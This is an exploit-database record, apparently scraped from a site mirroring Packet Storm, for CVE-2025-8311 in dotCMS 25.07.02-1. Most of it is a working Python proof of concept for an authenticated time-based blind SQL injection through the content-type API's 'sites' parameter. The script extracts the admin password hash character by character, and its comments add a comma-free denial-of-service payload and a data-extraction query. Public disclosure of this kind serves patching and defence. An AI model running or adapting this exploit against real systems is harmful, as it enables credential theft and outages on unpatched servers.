{“lastseen”:”2025-11-03T16:54:00″,”description”:”dotCMS………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211125″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8311″],”sourceData”:”#!\/usr\/bin\/env python3\\n \\n # Exploit Title: dotCMS 25.07.02-1 – Authenticated Blind SQL Injection\\n # Google Dork: N\/A\\n # Date: 2025-09-09\\n # Exploit Author: Matan Sandori (OSCP, OSEP, OSWE)\\n # Vendor Homepage:*https:\/\/www.dotcms.com\/\\n # Software Link: https:\/\/github.com\/dotCMS\/core\/releases\/tag\/v25.07.02-1 (tested on: v25.07.02-1)\\n # Version: Affects 24.03.22 and later (see vendor advisory for fixed versions)\\n # Tested on: dotCMS v25.07.02-1 (Docker \/ Linux)\\n # CVE: CVE-2025-8311\\n \\n \\n # The application blocks the comma character, so a simple DoS payload like:\\n # ‘) AND 1=(SELECT 1 FROM generate_series(1,500000) AS a CROSS JOIN generate_series(1,500000) AS b) AND (‘FYHh’ LIKE ‘FYHh\\n # will not work.\\n \\n # Instead, a comma-free payload can be used, for example:\\n # ‘) AND 1=(WITH RECURSIVE nums(i) AS (SELECT 1 UNION ALL SELECT i + 1 FROM nums WHERE i \\u003c 1000000) SELECT MIN(1) FROM nums AS a CROSS JOIN nums AS b) AND (‘A’ LIKE ‘A\\n \\n # Example query for time-based extraction of data:\\n # ‘) AND 1=(SELECT CASE WHEN (substring(emailaddress from 1 for 1)=’a’) THEN (SELECT 1 FROM pg_sleep(10) WHERE firstname=’Admin’) ELSE 1 END FROM user_ WHERE firstname=’Admin’) AND (‘1’ LIKE ‘1\\n \\n # This PoC demonstrates time-based blind SQLi. Error-based SQLi is also possible and allows faster data extraction.\\n # Using sqlmap with the –no-cast flag is recommended, as it will not work otherwise.\\n \\n import sys\\n import time\\n import string\\n import urllib3\\n import requests\\n \\n ### User configuration\\n HOST=\\”127.0.0.1:8443\\”;\\n TARGET_ACCOUNT = \\”admin@dotcms.com\\”;\\n SLEEP_TIME=10;\\n TOKEN=\\”eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhcGk0ZjFhNGYyMi1lYzI5LTQ4OTUtYTBlYi1jYjRkYjEzOGQ2MDAiLCJ4bW9kIjoxNzUxOTQzOTEwMDAwLCJuYmYiOjE3NTE5NDM5MTAsImlzcyI6ImRvdGNtc19kZXYiLCJsYWJlbCI6InRva2VuIiwiZXhwIjoxODQ2NjQxNjAxLCJpYXQiOjE3NTE5NDM5MTAsImp0aSI6IjMyNjIxYmRkLTNhYjEtNGRiMi1iNjEyLWMzMDg5M2EyODBiZSJ9.jqXkfM4Itxy_q2kA10srcL_3NBBx6keXx2PM0mESPFI\\”;\\n CHARS = string.printable;\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning);\\n \\n def encode_all_characters(string):\\n return \\”\\”.join(\\”%{0:0\\u003e2x}\\”.format(ord(char)) for char in string);\\n \\n def send_request(payload=\\”\\”):\\n payload = encode_all_characters(payload);\\n burp0_url = f\\”https:\/\/{HOST}\/api\/v1\/contenttype?filter=LCKwsF\\u0026page=774232\\u0026per_page=517532\\u0026orderby=wDdAmr\\u0026direction=DESC\\u0026type=DOTASSET\\u0026host=BBadoI\\u0026sites=PoC{payload}\\”;\\n burp0_headers = {\\”Accept-Encoding\\”: \\”gzip, deflate, br\\”, \\”Accept\\”: \\”*\/*\\”, \\”Accept-Language\\”: \\”en-US;q=0.9,en;q=0.8\\”, \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/138.0.0.0 Safari\/537.36\\”, \\”Connection\\”: \\”close\\”, \\”Cache-Control\\”: \\”max-age=0\\”, \\”Authorization\\”: f\\”Bearer {TOKEN}\\”};\\n return requests.get(burp0_url, headers=burp0_headers, verify=False);\\n \\n def send_sqli(q):\\n query = \\”‘) AND 1=(\\” + q + \\”) AND (‘A’ LIKE ‘A\\”;\\n return send_request(query);\\n \\n def test_sqli():\\n print(\\”[!] Checking target responsiveness…\\”)\\n r = send_request();\\n \\n if ‘{\\”entity\\”:[],\\”errors\\”:[],\\”i18nMessagesMap\\”:{},\\”messages\\”:[],\\”pagination\\”:{\\”currentPage\\”:’ not in r.text:\\n print(\\”[-] Target did NOT return the expected JSON structure. Exiting.\\”);\\n sys.exit(1);\\n \\n print(\\”[+] Target responded correctly.\\\\n\\”);\\n \\n r = send_sqli(f\\”SELECT 1 FROM PG_SLEEP({SLEEP_TIME})\\”);\\n \\n if (not r.elapsed.total_seconds() \\u003e= SLEEP_TIME):\\n print(\\”[-] Target did not pause as expected; Exiting.\\”);\\n sys.exit(1);\\n \\n \\n def retrieve_password(TEMPLATE, CHARS):\\n CHARS = \\”:\\” + CHARS.replace(\\”:\\”, ”);\\n output = \\”\\”;\\n index = 1;\\n \\n while True:\\n for character in CHARS:\\n query = str(TEMPLATE).replace(\\”[_INDEX_PLACEHOLDER_]\\”, str(index)).replace(\\”[_ASCII_PLACEHOLDER_]\\”, str(ord(character)));\\n \\n r = send_sqli(query);\\n \\n if (r.elapsed.total_seconds() \\u003e= SLEEP_TIME):\\n print(f\\”[+] Found character: {character}\\”);\\n index += 1;\\n output += character;\\n break;\\n else:\\n break;\\n \\n return output;\\n \\n test_sqli();\\n \\n print(\\”[+] Target is Vulnerable to SQL Injection.\\\\n\\”);\\n \\n TEMPLATE = f\\”SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) THEN (SELECT 1 FROM pg_sleep({SLEEP_TIME \/ 2}) WHERE emailaddress = ‘{TARGET_ACCOUNT}’) ELSE 1 END) from user_ where emailaddress = ‘{TARGET_ACCOUNT}’\\”;\\n \\n password = retrieve_password(TEMPLATE, CHARS);\\n \\n print(f\\”[+] Retrieved hash\/password for {TARGET_ACCOUNT}: {password}\\”);”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211125″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211125\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-03T16:54:00″,”description”:”dotCMS………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211125″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-8311″],”sourceData”:”#!\/usr\/bin\/env python3\\n \\n # Exploit Title: dotCMS 25.07.02-1 – Authenticated Blind SQL Injection\\n # Google Dork: N\/A\\n # Date: 2025-09-09\\n #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-24494","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n